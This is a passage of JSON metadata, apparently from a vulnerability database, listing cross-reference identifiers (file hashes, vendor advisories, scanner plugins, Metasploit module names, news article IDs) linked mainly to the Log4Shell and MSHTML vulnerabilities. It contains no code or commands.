"B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1624142243530526923", "KITPLOIT:1680589374755422772", "KITPLOIT:2590785192528609562", "KITPLOIT:3188944951765917430", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:3773942873037113539", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:5187040326820919368", "KITPLOIT:522409803487164759", "KITPLOIT:5230148353750207837", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:698315176468431184", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-40444", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB5005563"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165214", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167317", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB"]}, {"type": "thn", "idList": ["THN:1D10167F5D53B2791D676CF56488D5D9", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8A60310AB796B7372A105B7C8811306B", "THN:933FE23273AB5250B949633A337D44E1", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:BD014635C5F702379060A20290985162", "THN:C4188C7A44467E425407D33067C14094", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", 